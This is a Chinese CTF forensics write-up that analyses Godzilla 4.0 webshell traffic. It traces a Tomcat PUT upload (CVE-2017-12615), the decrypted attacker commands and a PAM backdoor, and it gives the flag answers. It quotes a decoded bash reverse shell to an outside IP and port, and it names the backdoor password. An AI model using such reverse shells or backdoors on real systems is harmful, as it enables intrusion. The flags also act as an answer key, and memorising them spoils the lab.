玄机-哥斯拉4.0流量分析

首先要了解哥斯拉的特征

弱特征：pass字段(哥斯拉必须通过某个参数来传入数据，默认为pass)、Accept字段、UA、以based64传输数据(若选择raw方式则不会有此特征)

强特征：

1.首次请求的固定三个数据包，不论哪种类型的shell哥斯拉在刚开始都会发起这三个请求。(第一个请求包数据很大，响应包空并设置sessionid；第二个与第三个请求都会携带cookie且有响应数据)；

2.cookie后分号；

3.响应体是前后各16位混淆字母包裹based64编码数据(哥斯拉有based64编码和raw两种传输方式，而这个特征仅限于based64方式传输，raw传输方式不存在此特征)

对响应包进行处理的话,首先去掉响应包数据的前16位以及后16位,然后对剩下的数据进行

base64解码 + aes解密,之后gzip解压缩即可。

1、黑客的IP是什么?

看样子在对服务器进行目录扫描，服务器向客户端返回404并不存在该文件，由此可知黑客的ip为192.168.31.190

flag{192.168.31.190}

2、黑客是通过什么漏洞进入服务器的?

进入服务器可能是通过漏洞post或put请求上传木马

hello.jsp为木马文件，在连接成功之前一定是上传hello.jsp木马文件到服务端

PUT上传漏洞是指Web服务器在处理HTTP PUT请求时存在的安全缺陷。通过这种漏洞，攻击者可以向服务器上传恶意文件

Tomcat服务器通过PUT方法任意写入文件漏洞（CVE-2017-12615）的复现和修复信息被提及。

ActiveMQ的PUT任意文件上传漏洞（CVE-2016-3088）也被讨论，攻击者可以通过PUT和MOVE请求上传WebShell文件，利用此漏洞获得未授权的服务器访问

这两个CVE都试试，只有CVE-2017-12615是正确的

flag{CVE-2017-12615}

3、黑客上传的木马文件名是什么?(提交文件名)

已经很明显，木马文件为hello.jsp

flag{hello.jsp}

4、黑客上传的木马连接密码是什么?

能看出是哥斯拉的特征

flag{7f0e6f}

5、黑客上传的木马解密密钥是什么?

xc为木马解密的密钥

 "1710acba6220f62b" 解密必须得知道这个密钥

flag{1710acba6220f62b}

6、黑客连接webshell后执行的第一条命令是什么?

继续往下开始查看

得到密码和密钥后对请求包进行解密

cmdLine sh -c "cd "/";uname -r" 2>&1arg-3 2>&1executableFile shexecutableArgs -c "cd "/";uname -r" 2>&1arg-0 shargsCount 4arg-1 -carg-2 cd "/";uname -rmethodName execCommand

• sh：调用shell。
• -c：指定要执行的命令。
• "cd "/";uname -r"：要执行的命令字符串，首先是cd "/"，然后是uname -r。
• uname -r ：显示当前操作系统的内核版本
• 2>&1：将标准错误（stderr）重定向到标准输出（stdout）。
• arg-3 2>&1：表示将错误输出重定向到标准输出。
• executableFile sh：表示要执行的可执行文件是sh。
• executableArgs -c "cd "/";uname -r" 2>&1：这是传递给可执行文件sh的参数。
• argsCount 4：表示总共有4个参数。
• arg-0 sh：第一个参数是sh。
• arg-1 -c：第二个参数是-c。
• arg-2 "cd "/";uname -r"：第三个参数是"cd "/";uname -r"。
• methodName execCommand：调用执行命令的方法名

第一条命令为 uname -r

flag{uname -r}

7、黑客连接webshell时查询当前shell的权限是什么?

对流量包逐一解密进行查看分析

执行id命令，返回内容表示已经为root用户

flag{root}

8、黑客利用webshell执行命令查询服务器Linux系统发行版本是什么?

对相应包进行解密得到版本

flag{Debian GNU/Linux 10 (buster)}

9、黑客利用webshel执行命令还查询并过滤了什么?

黑客先执行rpm命令发现不存在

rpm -qa | grep <pam>：搜索pam的软件包是否已安装

后执行了dpkg -l

列出 libpam-modules 包的 amd64 架构版本。如果该软件包已安装，会看到它的详细信息，包括版本号、描述等

flag{dpkg -l libpam-modules:amd64}

10、黑客留下后门的反连的IP和PORT是什么?(IP:PORT)

将这段进行解码L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuMTQzLzEzMTMgMD4mMQ==

能看到反弹shell会有反连的ip和port

/bin/bash -i >& /dev/tcp/192.168.31.143/1313 0>&1

flag{192.168.31.143:1313}

11、黑客通过什么文件留下了后门?

对下面进行解密发现后门文件

也可以登录到服务器进行查看

flag{pam_unix.so}

12、黑客设置的后门密码是什么?

flag{XJ@123}

13、黑客的恶意dnslog服务器地址是什么?

flag{c0ee2ad2d8.ipv6.xxx.eu.org.}